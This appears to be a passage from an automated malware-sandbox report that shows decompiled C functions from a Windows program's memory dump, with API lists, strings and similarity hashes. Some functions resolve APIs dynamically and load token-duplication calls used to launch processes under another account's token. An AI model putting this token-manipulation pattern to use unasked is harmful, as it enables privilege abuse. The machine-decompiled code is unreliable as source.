Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
strlen.MSVCRT ref: 00409CE4
strlen.MSVCRT ref: 00409CF1

Strings

ntdll.dll, xrefs: 00409CB3
GetProcAddress, xrefs: 00409C98, 00409C9D
LdrGetProcedureAddress, xrefs: 00409CBA
kernel32.dll, xrefs: 00409C8B

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcstrlen
String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
API String ID: 1027343248-2054640941
Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}

0x004028a3
0x004028ab
0x004028bd
0x004028ca
0x004028d7
0x004028e3
0x004028e6
0x004028e8
0x00000000
0x004028eb
0x004028ec

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

Strings

CreateProcessWithLogonW, xrefs: 004028B7
CreateProcessWithTokenW, xrefs: 004028C2
OpenProcessToken, xrefs: 004028CF
DuplicateTokenEx, xrefs: 004028DB
advapi32.dll, xrefs: 004028A6

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
API String ID: 2238633743-1970996977
Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14

Uniqueness

Uniqueness Score: -1.00%

Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}

APIs

memset.MSVCRT ref: 004045F6
memset.MSVCRT ref: 0040460B
_snwprintf.MSVCRT ref: 0040462A
_snwprintf.MSVCRT ref: 0040463E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404656
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404662
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?,?,00403904), ref: 0040466E

Strings

%s\shell\%s\command, xrefs: 00404618
%s\shell\%s, xrefs: 00404631

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete_snwprintfmemset$Close
String ID: %s\shell\%s$%s\shell\%s\command
API String ID: 1018939227-3575174989
Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
#17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

Strings

comctl32.dll, xrefs: 00403145
Error: Cannot load the common control classes., xrefs: 004031A7
Error, xrefs: 004031A2
InitCommonControlsEx, xrefs: 00403168

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

APIs

GetSystemMetrics.USER32 ref: 00404DC2
GetSystemMetrics.USER32 ref: 00404DC8
GetDC.USER32(00000000), ref: 00404DD5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
ReleaseDC.USER32 ref: 00404DF4
GetWindowRect.USER32 ref: 00404E07
GetParent.USER32(?), ref: 00404E12
GetWindowRect.USER32 ref: 00404E2F
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x0040639c
0x004063a4
0x004063b2
0x004063c2
0x004063d3
0x004063dc
0x004063eb
0x004063f0
0x00406401
0x00000000
0x0040641e
0x0040641f

APIs

Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE

wcscpy.MSVCRT ref: 004063B2
wcscpy.MSVCRT ref: 004063C2
GetPrivateProfileIntW.KERNEL32 ref: 004063D3

Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30

Strings

charset, xrefs: 004063E1
TranslatorName, xrefs: 004063F7
general, xrefs: 004063B7
rtl, xrefs: 004063CD
TranslatorURL, xrefs: 0040640B

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

APIs

memcpy.MSVCRT ref: 0040AE28
memcpy.MSVCRT ref: 0040AE54
memcpy.MSVCRT ref: 0040AE6E

Strings

<, xrefs: 0040AE05
&, xrefs: 0040AE4E
", xrefs: 0040AE22
<br>, xrefs: 0040AE68
>, xrefs: 0040AE13
°, xrefs: 0040AE3F

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF

Uniqueness

Uniqueness Score: -1.00%

Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}

APIs

memset.MSVCRT ref: 0040421E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
DragFinish.SHELL32(?), ref: 0040423F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

BeginDeferWindowPos.USER32 ref: 0040427D
EndDeferWindowPos.USER32(?), ref: 004043A4
InvalidateRect.USER32(?,?,00000001), ref: 004043AF

Strings

$, xrefs: 004043CA

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
String ID: $
API String ID: 2142561256-3993045852
Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
wcscpy.MSVCRT ref: 00405C02

Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE

wcslen.MSVCRT ref: 00405C20
GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73

Strings

strings, xrefs: 00405BF8

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

